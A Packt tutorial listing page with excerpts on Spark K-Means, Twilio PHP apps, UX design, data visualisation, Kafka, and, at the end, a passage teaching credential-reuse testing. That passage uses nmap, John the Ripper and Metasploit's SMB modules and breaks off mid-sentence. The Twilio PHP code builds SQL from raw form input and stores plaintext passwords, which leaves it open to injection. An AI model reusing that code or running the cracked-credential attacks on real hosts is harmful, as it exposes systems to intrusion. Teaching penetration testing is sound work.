Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Events
Videos
Audiobooks
Packt Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7018 Articles
article-image-implementing-apache-spark-k-means-clustering-method-on-digital-breath-test-data-for-road-safety
Savia Lobo
01 Mar 2018
7 min read
Save for later

Implementing Apache Spark K-Means Clustering method on digital breath test data for road safety

Savia Lobo
01 Mar 2018
7 min read
[box type="note" align="" class="" width=""]This article is an excerpt taken from a book Mastering Apache Spark 2.x - Second Edition written by Romeo Kienzler. In this book, you will learn to use Spark as a big data operating system, understand how to implement advanced analytics on the new APIs, and explore how easy it is to use Spark in day-to-day tasks.[/box] In today’s tutorial, we have used the Road Safety test data from our previous article, to show how one can attempt to find clusters in data using K-Means algorithm with Apache Spark MLlib. Theory on Clustering The K-Means algorithm iteratively attempts to determine clusters within the test data by minimizing the distance between the mean value of cluster center vectors, and the new candidate cluster member vectors. The following equation assumes dataset members that range from X1 to Xn; it also assumes K cluster sets that range from S1 to Sk, where K <= n. K-Means in practice The K-Means MLlib functionality uses the LabeledPoint structure to process its data and so it needs numeric input data. As the same data from the last section is being reused, we will not explain the data conversion again. The only change that has been made in data terms in this section, is that processing in HDFS will now take place under the /data/spark/kmeans/ directory. Additionally, the conversion Scala script for the K-Means example produces a record that is all comma-separated. The development and processing for the K-Means example has taken place under the /home/hadoop/spark/kmeans directory to separate the work from other development. The sbt configuration file is now called kmeans.sbt and is identical to the last example, except for the project name: name := "K-Means" The code for this section can be found in the software package under chapter7K-Means. So, looking at the code for kmeans1.scala, which is stored under kmeans/src/main/scala, some similar actions occur. The import statements refer to the Spark context and configuration. This time, however, the K-Means functionality is being imported from MLlib. Additionally, the application class name has been changed for this example to kmeans1: import org.apache.spark.SparkContext import org.apache.spark.SparkContext._ import org.apache.spark.SparkConf import org.apache.spark.mllib.linalg.Vectors import org.apache.spark.mllib.clustering.{KMeans,KMeansModel} object kmeans1 extends App { The same actions are being taken as in the last example to define the data file--to define the Spark configuration and create a Spark context: val hdfsServer = "hdfs://localhost:8020" val hdfsPath      = "/data/spark/kmeans/" val dataFile     = hdfsServer + hdfsPath + "DigitalBreathTestData2013- MALE2a.csv" val sparkMaster = "spark://localhost:7077" val appName = "K-Means 1" val conf = new SparkConf() conf.setMaster(sparkMaster) conf.setAppName(appName) val sparkCxt = new SparkContext(conf) Next, the CSV data is loaded from the data file and split by comma characters into the VectorData variable: val csvData = sparkCxt.textFile(dataFile) val VectorData = csvData.map { csvLine => Vectors.dense( csvLine.split(',').map(_.toDouble)) } A KMeans object is initialized, and the parameters are set to define the number of clusters and the maximum number of iterations to determine them: val kMeans = new KMeans val numClusters       = 3 val maxIterations     = 50 Some default values are defined for the initialization mode, number of runs, and Epsilon, which we needed for the K-Means call but did not vary for the processing. Finally, these parameters were set against the KMeans object: val initializationMode = KMeans.K_MEANS_PARALLEL val numRuns     = 1 val numEpsilon       = 1e-4 kMeans.setK( numClusters ) kMeans.setMaxIterations( maxIterations ) kMeans.setInitializationMode( initializationMode ) kMeans.setRuns( numRuns ) kMeans.setEpsilon( numEpsilon ) We cached the training vector data to improve the performance and trained the KMeans object using the vector data to create a trained K-Means model: VectorData.cache val kMeansModel = kMeans.run( VectorData ) We have computed the K-Means cost and number of input data rows, and have output the results via println statements. The cost value indicates how tightly the clusters are packed and how separate the clusters are: val kMeansCost = kMeansModel.computeCost( VectorData ) println( "Input data rows : " + VectorData.count() ) println( "K-Means Cost  : " + kMeansCost ) Next, we have used the K-Means Model to print the cluster centers as vectors for each of the three clusters that were computed: kMeansModel.clusterCenters.foreach{ println } Finally, we use the K-Means model predict function to create a list of cluster membership predictions. We then count these predictions by value to give a count of the data points in each cluster. This shows which clusters are bigger and whether there really are three clusters: val clusterRddInt = kMeansModel.predict( VectorData ) val clusterCount = clusterRddInt.countByValue clusterCount.toList.foreach{ println } } // end object kmeans1 So, in order to run this application, it must be compiled and packaged from the kmeans subdirectory as the Linux pwd command shows here: [hadoop@hc2nn kmeans]$ pwd /home/hadoop/spark/kmeans [hadoop@hc2nn kmeans]$ sbt package Loading /usr/share/sbt/bin/sbt-launch-lib.bash [info] Set current project to K-Means (in build file:/home/hadoop/spark/kmeans/) [info] Compiling 2 Scala sources to /home/hadoop/spark/kmeans/target/scala-2.10/classes... [info] Packaging /home/hadoop/spark/kmeans/target/scala-2.10/k- means_2.10-1.0.jar ... [info] Done packaging. [success] Total time: 20 s, completed Feb 19, 2015 5:02:07 PM Once this packaging is successful, we check HDFS to ensure that the test data is ready. As in the last example, we convert our data to numeric form using the convert.scala file, provided in the software package. We will process the DigitalBreathTestData2013- MALE2a.csv data file in the HDFS directory, /data/spark/kmeans, as follows: [hadoop@hc2nn nbayes]$ hdfs dfs -ls /data/spark/kmeans Found 3 items -rw-r--r--   3 hadoop supergroup 24645166 2015-02-05 21:11 /data/spark/kmeans/DigitalBreathTestData2013-MALE2.csv -rw-r--r--   3 hadoop supergroup 5694226 2015-02-05 21:48 /data/spark/kmeans/DigitalBreathTestData2013-MALE2a.csv drwxr-xr-x - hadoop supergroup   0 2015-02-05 21:46 /data/spark/kmeans/result The spark-submit tool is used to run the K-Means application. The only change in this command is that the class is now kmeans1: spark-submit --class kmeans1 --master spark://localhost:7077 --executor-memory 700M --total-executor-cores 100 /home/hadoop/spark/kmeans/target/scala-2.10/k-means_2.10-1.0.jar The output from the Spark cluster run is shown to be as follows: Input data rows : 467054 K-Means Cost  : 5.40312223450789E7 The previous output shows the input data volume, which looks correct; it also shows the K- Means cost value. The cost is based on the Within Set Sum of Squared Errors (WSSSE) which basically gives a measure how well the found cluster centroids are matching the distribution of the data points. The better they are matching, the lower the cost. The following link https://datasciencelab.wordpress.com/2013/12/27/finding-the-k-in-k-means-clustering/ explains WSSSE and how to find a good value for k in more detail. Next come the three vectors, which describe the data cluster centers with the correct number of dimensions. Remember that these cluster centroid vectors will have the same number of columns as the original vector data: [0.24698249738061878,1.3015883142472253,0.005830116872250263,2.917374778855 5207,1.156645130895448,3.4400290524342454] [0.3321793984152627,1.784137241326256,0.007615970459266097,2.58319870759289 17,119.58366028156011,3.8379106085083468] [0.25247226760684494,1.702510963969387,0.006384899819416975,2.2314042480006 88,52.202897927594805,3.551509158139135] Finally, cluster membership is given for clusters 1 to 3 with cluster 1 (index 0) having the largest membership at 407539 member vectors: (0,407539) (1,12999) (2,46516) To summarize, we saw a practical  example that shows how K-means algorithm is used to cluster data with the help of Apache Spark. If you found this post useful, do check out this book Mastering Apache Spark 2.x - Second Edition to learn about the latest enhancements in Apache Spark 2.x, such as interactive querying of live data and unifying DataFrames and Datasets.
Read more
  • 0
  • 1
  • 16136

article-image-article-phone-calls-send-sms-your-website-using-twilio
Packt
21 Mar 2014
9 min read
Save for later

Make phone calls and send SMS messages from your website using Twilio

Packt
21 Mar 2014
9 min read
(For more resources related to this topic, see here.) Sending a message from a website Sending messages from a website has many uses; sending notifications to users is one good example. In this example, we're going to present you with a form where you can enter a phone number and message and send it to your user. This can be quickly adapted for other uses. Getting ready The complete source code for this recipe can be found in the Chapter6/Recipe1/ folder. How to do it... Ok, let's learn how to send an SMS message from a website. The user will be prompted to fill out a form that will send the SMS message to the phone number entered in the form. Download the Twilio Helper Library from https://github.com/twilio/twilio-php/zipball/master and unzip it. Upload the Services/ folder to your website. Upload config.php to your website and make sure the following variables are set: <?php $accountsid = ''; // YOUR TWILIO ACCOUNT SID $authtoken = ''; // YOUR TWILIO AUTH TOKEN $fromNumber = ''; // PHONE NUMBER CALLS WILL COME FROM ?> Upload a file called sms.php and add the following code to it: <!DOCTYPE html> <html> <head> <title>Recipe 1 – Chapter 6</title> </head> <body> <?php include('Services/Twilio.php'); include("config.php"); include("functions.php"); $client = new Services_Twilio($accountsid, $authtoken); if( isset($_POST['number']) && isset($_POST['message']) ){ $sid = send_sms($_POST['number'],$_POST['message']); echo "Message sent to {$_POST['number']}"; } ?> <form method="post"> <input type="text" name="number" placeholder="Phone Number...." /><br /> <input type="text" name="message" placeholder="Message...." /><br /> <button type="submit">Send Message</button> </form> </body> </html> Create a file called functions.php and add the following code to it: <?php function send_sms($number,$message){ global $client,$fromNumber; $sms = $client->account->sms_messages->create( $fromNumber, $number, $message ); return $sms->sid; } How it works... In steps 1 and 2, we downloaded and installed the Twilio Helper Library for PHP. This library is the heart of your Twilio-powered apps. In step 3, we uploaded config.php that contains our authentication information to talk to Twilio's API. In steps 4 and 5, we created sms.php and functions.php, which will send a message to the phone number we enter. The send_sms function is handy for initiating SMS conversations; we'll be building on this function heavily in the rest of the article. Allowing users to make calls from their call logs We're going to give your user a place to view their call log. We will display a list of incoming calls and give them the option to call back on these numbers. Getting ready The complete source code for this recipe can be found in the Chapter9/Recipe4 folder. How to do it... Now, let's build a section for our users to log in to using the following steps: Update a file called index.php with the following content: <?php session_start(); include 'Services/Twilio.php'; require("system/jolt.php"); require("system/pdo.class.php"); require("system/functions.php"); $_GET['route'] = isset($_GET['route']) ? '/'.$_GET['route'] : '/'; $app = new Jolt('site',false); $app->option('source', 'config.ini'); #$pdo = Db::singleton(); $mysiteURL = $app->option('site.url'); $app->condition('signed_in', function () use ($app) { $app->redirect( $app->getBaseUri().'/login',!$app->store('user')); }); $app->get('/login', function() use ($app){ $app->render( 'login', array(),'layout' ); }); $app->post('/login', function() use ($app){ $sql = "SELECT * FROM `user` WHERE `email`='{$_POST['user']}' AND `password`='{$_POST['pass']}'"; $pdo = Db::singleton(); $res = $pdo->query( $sql ); $user = $res->fetch(); if( isset($user['ID']) ){ $_SESSION['uid'] = $user['ID']; $app->store('user',$user['ID']); $app->redirect( $app->getBaseUri().'/home'); }else{ $app->redirect( $app->getBaseUri().'/login'); } }); $app->get('/signup', function() use ($app){ $app->render( 'register', array(),'layout' ); }); $app->post('/signup', function() use ($app){ $client = new Services_Twilio($app->store('twilio.accountsid'), $app->store('twilio.authtoken') ); extract($_POST); $timestamp = strtotime( $timestamp ); $subaccount = $client->accounts->create(array( "FriendlyName" => $email )); $sid = $subaccount->sid; $token = $subaccount->auth_token; $sql = "INSERT INTO 'user' SET `name`='{$name}',`email`='{$email }',`password`='{$password}',`phone_number`='{$phone_number}',`sid` ='{$sid}',`token`='{$token}',`status`=1"; $pdo = Db::singleton(); $pdo->exec($sql); $uid = $pdo->lastInsertId(); $app->store('user',$uid ); // log user in $app->redirect( $app->getBaseUri().'/phone-number'); }); $app->get('/phone-number', function() use ($app){ $app->condition('signed_in'); $user = $app->store('user'); $client = new Services_Twilio($user['sid'], $user['token']); $app->render('phone-number'); }); $app->post("search", function() use ($app){ $app->condition('signed_in'); $user = get_user( $app->store('user') ); $client = new Services_Twilio($user['sid'], $user['token']); $SearchParams = array(); $SearchParams['InPostalCode'] = !empty($_POST['postal_code']) ? trim($_POST['postal_code']) : ''; $SearchParams['NearNumber'] = !empty($_POST['near_number']) ? trim($_POST['near_number']) : ''; $SearchParams['Contains'] = !empty($_POST['contains'])? trim($_ POST['contains']) : '' ; try { $numbers = $client->account->available_phone_numbers->getList('US', 'Local', $SearchParams); if(empty($numbers)) { $err = urlencode("We didn't find any phone numbers by that search"); $app->redirect( $app->getBaseUri().'/phone-number?msg='.$err); exit(0); } } catch (Exception $e) { $err = urlencode("Error processing search: {$e->getMessage()}"); $app->redirect( $app->getBaseUri().'/phone-number?msg='.$err); exit(0); } $app->render('search',array('numbers'=>$numbers)); }); $app->post("buy", function() use ($app){ $app->condition('signed_in'); $user = get_user( $app->store('user') ); $client = new Services_Twilio($user['sid'], $user['token']); $PhoneNumber = $_POST['PhoneNumber']; try { $number = $client->account->incoming_phone_numbers->create(array( 'PhoneNumber' => $PhoneNumber )); $phsid = $number->sid; if ( !empty($phsid) ){ $sql = "INSERT INTO numbers (user_id,number,sid) VALUES('{$u ser['ID']}','{$PhoneNumber}','{$phsid}');"; $pdo = Db::singleton(); $pdo->exec($sql); $fid = $pdo->lastInsertId(); $ret = editNumber($phsid,array( "FriendlyName"=>$PhoneNumber, "VoiceUrl" => $mysiteURL."/voice?id=".$fid, "VoiceMethod" => "POST", ),$user['sid'], $user['token']); } } catch (Exception $e) { $err = urlencode("Error purchasing number: {$e->getMessage()}"); $app->redirect( $app->getBaseUri().'/phone-number?msg='.$err); exit(0); } $msg = urlencode("Thank you for purchasing $PhoneNumber"); header("Location: index.php?msg=$msg"); $app->redirect( $app->getBaseUri().'/home?msg='.$msg); exit(0); }); $app->route('/voice', function() use ($app){ }); $app->get('/transcribe', function() use ($app){ }); $app->get('/logout', function() use ($app){ $app->store('user',0); $app->redirect( $app->getBaseUri().'/login'); }); $app->get('/home', function() use ($app){ $app->condition('signed_in'); $uid = $app->store('user'); $user = get_user( $uid ); $client = new Services_Twilio($user['sid'], $user['token']); $app->render('dashboard',array( 'user'=>$user, 'client'=>$client )); }); $app->get('/delete', function() use ($app){ $app->condition('signed_in'); }); $app->get('/', function() use ($app){ $app->render( 'home' ); }); $app->listen(); Upload a file called dashboard.php with the following content to your views folder: <h2>My Number</h2> <?php $pdo = Db::singleton(); $sql = "SELECT * FROM `numbers` WHERE `user_ id`='{$user['ID']}'"; $res = $pdo->query( $sql ); while( $row = $res->fetch() ){ echo preg_replace("/[^0-9]/", "", $row['number']); } try { ?> <h2>My Call History</h2> <p>Here are a list of recent calls, you can click any number to call them back, we will call your registered phone number and then the caller</p> <table width=100% class="table table-hover tabled-striped"> <thead> <tr> <th>From</th> <th>To</th> <th>Start Date</th> <th>End Date</th> <th>Duration</th> </tr> </thead> <tbody> <?php foreach ($client->account->calls as $call) { # echo "<p>Call from $call->from to $call->to at $call->start_time of length $call->duration</p>"; if( !stristr($call->direction,'inbound') ) continue; $type = find_in_list($call->from); ?> <tr> <td><a href="<?=$uri?>/call?number=<?=urlencode($call->from)?>"><?=$call->from?></a></td> <td><?=$call->to?></td> <td><?=$call->start_time?></td> <td><?=$call->end_time?></td> <td><?=$call->duration?></td> </tr> <?php } ?> </tbody> </table> <?php } catch (Exception $e) { echo 'Error: ' . $e->getMessage(); } ?> <hr /> <a href="<?=$uri?>/delete" onclick="return confirm('Are you sure you wish to close your account?');">Delete My Account</a> How it works... In step 1, we updated the index.php file. In step 2, we uploaded dashboard.php to the views folder. This file checks if we're logged in using the $app->condition('signed_in') method, which we discussed earlier, and if we are, it displays all incoming calls we've had to our account. We can then push a button to call one of those numbers and whitelist or blacklist them. Summary Thus in this article we have learned how to send messages and make phone calls from your website using Twilio. Resources for Article: Further resources on this subject: Make phone calls, send SMS from your website using Twilio [article] Trunks in FreePBX 2.5 [article] Trunks using 3CX: Part 1 [article]
Read more
  • 0
  • 0
  • 16111

article-image-why-motion-and-interaction-matter-in-a-ux-design-video
Sugandha Lahoti
16 Oct 2018
2 min read
Save for later

Why Motion and Interaction matter in a UX design? [Video]

Sugandha Lahoti
16 Oct 2018
2 min read
Designing prototypes is a great way to extend your sketching skills and to test the products you’ve been building. In particular, user experience prototyping solves problems for users, infuses user needs into conversations, that eventually build better products and services. Motion and interaction are part of user experience prototyping. Motion helps in enforcing and exploring what the interaction design is like and prototyping interactions help us define how a product works. This clip is taken from the video Advanced UX Techniques by Chris R. Becker. In this course, you will explore UX techniques such as sketching, wireframes, and high-fidelity prototypes. https://www.youtube.com/watch?v=TTpxvuIBFwE Interaction Design (IxD) is the design of interactive products and services in which a designer’s focus is on including the way users will interact with it. In this video, we’ll explore the following five aspects of interaction design: Words: Do users understand, read and use the shape Objects: Do users recognize and use the shapes, if it’s a phone or a keyboard Time: The time is taken by users in accomplishing a task ( Are they reading a long article) Behavior: How do users respond or react to anything that app designers make them do. Visuals: Do users like what they see As you iterate on the prototypes of your app, you should be evaluating them against these aspects in your interaction design. The role of interaction design is trying to define the ways a user can interact. Interactions can be complex so strong focus should be given on thinking about how the systems are interconnected. Interactions are learned and can be improved through animations. Watch the clip above to learn more about why motion and interaction design are key aspects in a UX Design. About the Author Chris R. Becker is an Imaginative and creative Sr. UX designer/IxD/design thinker and educator. He designs across media platforms from the web to iOS and Android as well as SaaS and service design. He leads Design thinking workshops and UX deliverables, all the while using communication skills both in the classroom and for client presentations. What UX designers can teach Machine Learning Engineers? To start with: Model Interpretability. Trends UX Design. Grafana 5.3 is now stable, comes with Google Stackdriver built-in support, a new Postgres query builder
Read more
  • 0
  • 0
  • 16106

article-image-getting-started-with-data-storytelling
Aaron Lazar
28 Jan 2018
11 min read
Save for later

Getting Started with Data Storytelling

Aaron Lazar
28 Jan 2018
11 min read
[box type="note" align="" class="" width=""]This article has been taken from the book Principles of Data Science, written by Sinan Ozdemir. It aims to practically introduce you to the different ways in which you can communicate or visualize your data to tell stories effectively.[/box] Communication matters Being able to conduct experiments and manipulate data in a coding language is not enough to conduct practical and applied data science. This is because data science is, generally, only as good as how it is used in practice. For instance, a medical data scientist might be able to predict the chance of a tourist contracting Malaria in developing countries with >98% accuracy, however, if these results are published in a poorly marketed journal and online mentions of the study are minimal, their groundbreaking results that could potentially prevent deaths would never see the true light of day. For this reason, communication of results through data storytelling is arguably as important as the results themselves. A famous example of poor management of distribution of results is the case of Gregor Mendel. Mendel is widely recognized as one of the founders of modern genetics. However, his results (including data and charts) were not well adopted until after his death. Mendel even sent them to Charles Darwin, who largely ignored Mendel's papers, which were written in unknown Moravian journals. Generally, there are two ways of presenting results: verbal and visual. Of course, both the verbal and visual forms of communication can be broken down into dozens of subcategories, including slide decks, charts, journal papers, and even university lectures. However, we can find common elements of data presentation that can make anyone in the field more aware and effective in their communication skills. Let's dive right into effective (and ineffective) forms of communication, starting with visuals. We’ll look at four basic types of graphs: scatter plots, line graphs, bar charts, histograms, and box plots. Scatter plots A scatter plot is probably one of the simplest graphs to create. It is made by creating two quantitative axes and using data points to represent observations. The main goal of a scatter plot is to highlight relationships between two variables and, if possible, reveal a correlation. For example, we can look at two variables: average hours of TV watched in a day and a 0-100 scale of work performance (0 being very poor performance and 100 being excellent performance). The goal here is to find a relationship (if it exists) between watching TV and average work performance. The following code simulates a survey of a few people, in which they revealed the amount of television they watched, on an average, in a day against a company-standard work performance metric: import pandas as pd hours_tv_watched = [0, 0, 0, 1, 1.3, 1.4, 2, 2.1, 2.6, 3.2, 4.1, 4.4, 4.4, 5] This line of code is creating 14 sample survey results of people answering the question of how many hours of TV they watch in a day. work_performance = [87, 89, 92, 90, 82, 80, 77, 80, 76, 85, 80, 75, 73, 72] This line of code is creating 14 new sample survey results of the same people being rated on their work performance on a scale from 0 to 100. For example, the first person watched 0 hours of TV a day and was rated 87/100 on their work, while the last person watched, on an average, 5 hours of TV a day and was rated 72/100: df = pd.DataFrame({'hours_tv_watched':hours_tv_watched, 'work_ performance':work_performance}) Here, we are creating a Dataframe in order to ease our exploratory data analysis and make it easier to make a scatter plot: df.plot(x='hours_tv_watched', y='work_performance', kind='scatter') Now, we are actually making our scatter plot. In the following plot, we can see that our axes represent the number of hours of TV watched in a day and the person's work performance metric: Each point on a scatter plot represents a single observation (in this case a person) and its location is a result of where the observation stands on each variable. This scatter plot does seem to show a relationship, which implies that as we watch more TV in the day, it seems to affect our work performance. Of course, as we are now experts in statistics from the last two chapters, we know that this might not be causational. A scatter plot may only work to reveal a correlation or an association between but not a causation. Advanced statistical tests, such as the ones we saw in Chapter 8, Advanced Statistics, might work to reveal causation. Later on in this chapter, we will see the damaging effects that trusting correlation might have. Line graphs Line graphs are, perhaps, one of the most widely used graphs in data communication. A line graph simply uses lines to connect data points and usually represents time on the x axis. Line graphs are a popular way to show changes in variables over time. The line graph, like the scatter plot, is used to plot quantitative variables. As a great example, many of us wonder about the possible links between what we see on TV and our behavior in the world. A friend of mine once took this thought to an extreme—he wondered if he could find a relationship between the TV show, The X-Files, and the amount of UFO sightings in the U.S.. He then found the number of sightings of UFOs per year and plotted them over time. He then added a quick graphic to ensure that readers would be able to identify the point in time when the X-files were released: It appears to be clear that right after 1993, the year of the X-Files premier, the number of UFO sightings started to climb drastically. This graphic, albeit light-hearted, is an excellent example of a simple line graph. We are told what each axis measures, we can quickly see a general trend in the data, and we can identify with the author's intent, which is to show a relationship between the number of UFO sightings and the X-files premier. On the other hand, the following is a less impressive line chart: This line graph attempts to highlight the change in the price of gas by plotting three points in time. At first glance, it is not much different than the previous graph—we have time on the bottom x axis and a quantitative value on the vertical y axis. The (not so) subtle difference here is that the three points are equally spaced out on the x axis; however, if we read their actual time indications, they are not equally spaced out in time. A year separates the first two points whereas a mere 7 days separates the last two points. Bar charts We generally turn to bar charts when trying to compare variables across different groups. For example, we can plot the number of countries per continent using a bar chart. Note how the x axis does not represent a quantitative variable, in fact, when using a bar chart, the x axis is generally a categorical variable, while the y axis is quantitative. Note that, for this code, I am using the World Health Organization's report on alcohol consumption around the world by country: drinks = pd.read_csv('data/drinks.csv') drinks.continent.value_counts().plot(kind='bar', title='Countries per Continent') plt.xlabel('Continent') plt.ylabel('Count') The following graph shows us a count of the number of countries in each continent. We can see the continent code at the bottom of the bars and the bar height represents the number of countries we have in each continent. For example, we see that Africa has the most countries represented in our survey, while South America has the least: In addition to the count of countries, we can also plot the average beer servings per continent using a bar chart, as shown: drinks.groupby('continent').beer_servings.mean().plot(kind='bar') Note how a scatter plot or a line graph would not be able to support this data because they can only handle quantitative variables; bar graphs have the ability to demonstrate categorical values. We can also use bar charts to graph variables that change over time, like a line graph. Histograms Histograms show the frequency distribution of a single quantitative variable by splitting up the data, by range, into equidistant bins and plotting the raw count of observations in each bin. A histogram is effectively a bar chart where the x axis is a bin (subrange) of values and the y axis is a count. As an example, I will import a store's daily number of unique customers, as shown: rossmann_sales = pd.read_csv('data/rossmann.csv') rossmann_sales.head() Note how we have multiple store data (by the first Store column). Let's subset this data for only the first store, as shown: first_rossmann_sales = rossmann_sales[rossmann_sales['Store']==1] Now, let's plot a histogram of the first store's customer count: first_rossmann_sales['Customers'].hist(bins=20) plt.xlabel('Customer Bins') plt.ylabel('Count') The x axis is now categorical in that each category is a selected range of values, for example, 600-620 customers would potentially be a category. The y axis, like a bar chart, is plotting the number of observations in each category. In this graph, for example, one might take away the fact that most of the time, the number of customers on any given day will fall between 500 and 700. Altogether, histograms are used to visualize the distribution of values that a quantitative variable can take on. Box plots Box plots are also used to show a distribution of values. They are created by plotting the five number summary, as follows: The minimum value The first quartile (the number that separates the 25% lowest values from the rest) The median The third quartile (the number that separates the 25% highest values from the rest) The maximum value In Pandas, when we create box plots, the red line denotes the median, the top of the box (or the right if it is horizontal) is the third quartile, and the bottom (left) part of the box is the first quartile. The following is a series of box plots showing the distribution of beer consumption according to continents: drinks.boxplot(column='beer_servings', by='continent') Now, we can clearly see the distribution of beer consumption across the seven continents and how they differ. Africa and Asia have a much lower median of beer consumption than Europe or North America. Box plots also have the added bonus of being able to show outliers much better than a histogram. This is because the minimum and maximum are parts of the box plot. Getting back to the customer data, let's look at the same store customer numbers, but using a box plot: first_rossmann_sales.boxplot(column='Customers', vert=False) This is the exact same data as plotted earlier in the histogram; however, now it is shown as a box plot. For the purpose of comparison, I will show you both the graphs one after the other: Note how the x axis for each graph are the same, ranging from 0 to 1,200. The box plot is much quicker at giving us a center of the data, the red line is the median, while the histogram works much better in showing us how spread out the data is and where people's biggest bins are. For example, the histogram reveals that there is a very large bin of zero people. This means that for a little over 150 days of data, there were zero customers. Note that we can get the exact numbers to construct a box plot using the describe feature in Pandas, as shown: first_rossmann_sales['Customers'].describe() min 0.000000 25% 463.000000 50% 529.000000 75% 598.750000 max 1130.000000 There we have it! We just learned data storytelling through various techniques like scatter plots, line graphs, bar charts, histograms and box plots. Now you’ve got the power to be creative in the way you tell tales of your data! If you found our article useful, you can check out Principles of Data Science for more interesting Data Science tips and techniques.    
Read more
  • 0
  • 0
  • 16096

article-image-introducing-kafka
Packt
10 Oct 2013
6 min read
Save for later

Introducing Kafka

Packt
10 Oct 2013
6 min read
(For more resources related to this topic, see here.) In today's world, real-time information is continuously getting generated by applications (business, social, or any other type), and this information needs easy ways to be reliably and quickly routed to multiple types of receivers. Most of the time, applications that are producing information and applications that are consuming this information are well apart and inaccessible to each other. This, at times, leads to redevelopment of information of producers or consumers to provide an integration point between them. Therefore, a mechanism is required for seamless integration of information of producers and consumers to avoid any kind of rewriting of an application at either end. In the present era of big data, the first challenge is to collect the data and the second challenge is to analyze it. As it is a huge amount of data, the analysis typically includes the following and much more: User behavior data Application performance tracing Activity data in the form of logs Event messages Message publishing is a mechanism for connecting various applications with the help of messages that are routed between them, for example, by a message broker such as Kafka. Kafka is a solution to the real-time problems of any software solution, that is, to deal with real-time volumes of information and route it to multiple consumers quickly. Kafka provides seamless integration between information of producers and consumers without blocking the producers of the information, and without letting producers know who the final consumers are. Apache Kafka is an open source, distributed publish-subscribe messaging system, mainly designed with the following characteristics: Persistent messaging: To derive the real value from big data, any kind of information loss cannot be afforded. Apache Kafka is designed with O(1) disk structures that provide constant-time performance even with very large volumes of stored messages, which is in order of TB. High throughput: Keeping big data in mind, Kafka is designed to work on commodity hardware and to support millions of messages per second. Distributed: Apache Kafka explicitly supports messages partitioning over Kafka servers and distributing consumption over a cluster of consumer machines while maintaining per-partition ordering semantics. Multiple client support: Apache Kafka system supports easy integration of clients from different platforms such as Java, .NET, PHP, Ruby, and Python. Real time: Messages produced by the producer threads should be immediately visible to consumer threads; this feature is critical to event-based systems such as Complex Event Processing (CEP) systems. Kafka provides a real-time publish-subscribe solution, which overcomes the challenges of real-time data usage for consumption, for data volumes that may grow in order of magnitude, larger that the real data. Kafka also supports parallel data loading in the Hadoop systems. The following diagram shows a typical big data aggregation-and-analysis scenario supported by the Apache Kafka messaging system: At the production side, there are different kinds of producers, such as the following: Frontend web applications generating application logs Producer proxies generating web analytics logs Producer adapters generating transformation logs Producer services generating invocation trace logs At the consumption side, there are different kinds of consumers, such as the following: Offline consumers that are consuming messages and storing them in Hadoop or traditional data warehouse for offline analysis Near real-time consumers that are consuming messages and storing them in any NoSQL datastore such as HBase or Cassandra for near real-time analytics Real-time consumers that filter messages in the in-memory database and trigger alert events for related groups Need for Kafka A large amount of data is generated by companies having any form of web-based presence and activity. Data is one of the newer ingredients in these Internet-based systems. This data typically includes user-activity events corresponding to logins, page visits, clicks, social networking activities such as likes, sharing, and comments, and operational and system metrics. This data is typically handled by logging and traditional log aggregation solutions due to high throughput (millions of messages per second). These traditional solutions are the viable solutions for providing logging data to an offline analysis system such as Hadoop. However, the solutions are very limiting for building real-time processing systems. According to the new trends in Internet applications, activity data has become a part of production data and is used to run analytics at real time. These analytics can be: Search based on relevance Recommendations based on popularity, co-occurrence, or sentimental analysis Delivering advertisements to the masses Internet application security from spam or unauthorized data scraping Real-time usage of these multiple sets of data collected from production systems has become a challenge because of the volume of data collected and processed. Apache Kafka aims to unify offline and online processing by providing a mechanism for parallel load in Hadoop systems as well as the ability to partition real-time consumption over a cluster of machines. Kafka can be compared with Scribe or Flume as it is useful for processing activity stream data; but from the architecture perspective, it is closer to traditional messaging systems such as ActiveMQ or RabitMQ. Few Kafka usages Some of the companies that are using Apache Kafka in their respective use cases are as follows: LinkedIn (www.linkedin.com): Apache Kafka is used at LinkedIn for the streaming of activity data and operational metrics. This data powers various products such as LinkedIn news feed and LinkedIn Today in addition to offline analytics systems such as Hadoop. DataSift (www.datasift.com/): At DataSift, Kafka is used as a collector for monitoring events and as a tracker of users' consumption of data streams in real time. Twitter (www.twitter.com/): Twitter uses Kafka as a part of its Storm— a stream-processing infrastructure. Foursquare (www.foursquare.com/): Kafka powers online-to-online and online-to-offline messaging at Foursquare. It is used to integrate Foursquare monitoring and production systems with Foursquare, Hadoop-based offline infrastructures. Square (www.squareup.com/): Square uses Kafka as a bus to move all system events through Square's various datacenters. This includes metrics, logs, custom events, and so on. On the consumer side, it outputs into Splunk, Graphite, or Esper-like real-time alerting. The source of the above information is https: //cwiki. apache.org/confluence/display/KAFKA/Powered+By. Summary In this article, we have seen how companies are evolving the mechanism of collecting and processing application-generated data, and that of utilizing the real power of this data by running analytics over it. Resources for Article: Further resources on this subject: Apache Felix Gogo [Article] Hadoop and HDInsight in a Heartbeat [Article] Advanced Hadoop MapReduce Administration [Article]
Read more
  • 0
  • 0
  • 16074

article-image-exploiting-services-python
Packt
24 Sep 2015
15 min read
Save for later

Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many 